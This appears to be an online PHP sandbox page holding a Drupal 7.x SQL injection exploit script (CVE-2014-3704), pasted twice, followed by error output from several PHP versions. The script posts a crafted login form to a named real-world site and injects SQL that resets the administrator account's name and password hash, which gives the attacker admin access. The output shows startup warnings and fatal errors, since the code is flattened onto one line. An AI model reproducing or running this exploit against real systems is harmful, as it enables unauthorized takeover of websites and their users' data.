<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>
Output for 8.0.13
Fatal error: Uncaught Error: Undefined constant "php" in /in/boZOu:1
Stack trace:
#0 {main}
thrown in /in/boZOu on line 1
Process exited with code 255.
Output for 7.2.0 - 7.2.13, 7.3.32 - 7.3.33, 7.4.33
Warning: Use of undefined constant php - assumed 'php' (this will throw an Error in a future version of PHP) in /in/boZOu on line 1